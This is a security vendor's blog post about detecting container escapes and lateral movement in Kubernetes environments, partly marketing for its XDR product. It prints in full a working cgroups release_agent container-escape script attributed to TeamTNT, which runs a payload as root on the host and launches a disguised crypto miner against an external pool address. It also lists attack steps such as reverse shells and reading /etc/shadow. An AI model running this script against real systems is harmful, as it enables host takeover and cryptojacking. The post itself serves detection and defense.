Threat Detections for Container Lateral Movements and Container Escapes — This is How

A container wide open. source: technadu.com

Introduction

The simplicity and flexibility of microservice architecture has led to an increasing adoption of containers and kubernetes in the cloud. According to Gartner, more than 75% of global organizations will be running containerized apps in production by 2022.

As the adoption increases, threat actors are evolving their toolsets to compromise container workloads. Recently, it is reported that 50,000 IPs across multiple Kubernetes clusters were compromised by TeamTNT.

Threat actors typically exploit vulnerabilities and/or misconfigurations of the container workloads. They can not only move between containers, but also move between containers and the underlying hosts. Recently, we observed that threat actors such as TeamTNT has developed more sophisticated techniques to perform container escapes.

TeamTNT’s Container Escape

In the TeamTNT operation we observed, once it gains foothold on a privileged container, it uses a container escape technique similar to the initial POC tweeted by Felix Wilhelm from Google. It abuses the cgroups release_agent feature as shown below:

#!/bin/sh
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release 
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab) 
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo "#!/bin/sh" > /cmd
echo "while true; do pkill -9 xmrig; sleep 3; done" >> /cmd
chmod a+x /cmd
sh -c 'echo 0 >/tmp/cgrp/x/cgroup.procs'
/nginx --donate-level 0 -o 46.101.19.93:3333 -u <hidden> -p <hidden> --nichehash

By using the above script, an attacker is able to break out of the container and execute the cmd script as root if the container is ran as a privileged container. The nginx binary is actually a cryptocurrency miner. The attacker may used the name nginx to trick the victim into thinking that it’s legitimate web server and evade detections.

Container Lateral Movements and Container Escapes

Container lateral movements can be classified into three categories:

1. Container to host (including container escapes)
2. Host to container
3. Container to container

Container escape can be further classified into three categories:

1. Escape via configuration abuse
2. Escape via kernel vulnerabilities
3. Escape via container engine vulnerabilities

Detecting these activities is critical for detection and response. For example, in the case of container escape, an attacker who escapes the container will likely have access to host resources and other containers on the host.

The Confluera Approach

While traditional point-based detections show users a sea of independent alerts, Confluera XDR presents real-time threat progressions (a.k.a. incident timeline or attack narrative) to users and significantly improves efficacy. This allows DevSecOps/SOC analysts to quickly identify risk and prioritize risks mitigations by reviewing the logical threat progression instead of investigating the sea of independent alerts.

Threat Progression for A Container Escape

In this post, we will demonstrate an example of Confluera XDR’s threat progression for containers.

Let’s look at an example breach involving container escape with cgroups release_agent. This belongs to the “Escape via configuration abuse” category we mentioned above. We will visualize this incident through the lens of the MITRE ATT&CK framework, the de-facto industry standard for the definition and classification of infrastructure wide cyberattacks.

Our victim environment has a host machines (joe-el8) running a privileged container (the container ID ends with 7a1f40).

The attacker performed the following actions:

1. Exploited a nodejs web application vulnerability on the container and used server processes to create shell processes with command (“Execution” technique)
2. Spawned a reverse shell to the C2 server (“Execution” technique)
3. Wrote payload to release_agent configuration files (“Persistence” technique)
4. Let host execute the malicious payload using release_agent feature (“Lateral Movement” technique)
5. Let host execute the abnormal file generated by the container from the host file system as root (“Privilege Escalation” technique)
6. Ran suspicious network tools netcat in the container (“Execution” technique)
7. Spawned a root reverse shell from the host to the container (“Execution” technique)
8. Accessed the host /etc/shadow file in an abnormal way (“Credential Access” technique)

Confluera detects and captures the sequence of activities into a single threat progression as shown in the screenshot below. Keep in mind that there can be any number of alerts triggered on this host and/or this container by other activities. However, this threat progression will not show those alerts and therefore significantly improves efficacy.

Confluera XDR surfaces threat progression across your entire infrastructure instead of independent alerts

Conclusion

Malicious actors are becoming more sophisticated and constantly inventing new ways to attack the cloud infrastructure.

This blog post demonstrates an example of Confluera XDR’s precise execution tracking on attacker’s pre-and post-exploitation behaviors in a container environment.

Moreover, Confluera XDR detects threat progressions across endpoint, network and cloud. It also prevents successful cyber attacks by coordinating with endpoint, network, and cloud controls.

Contact us if you would like to know more.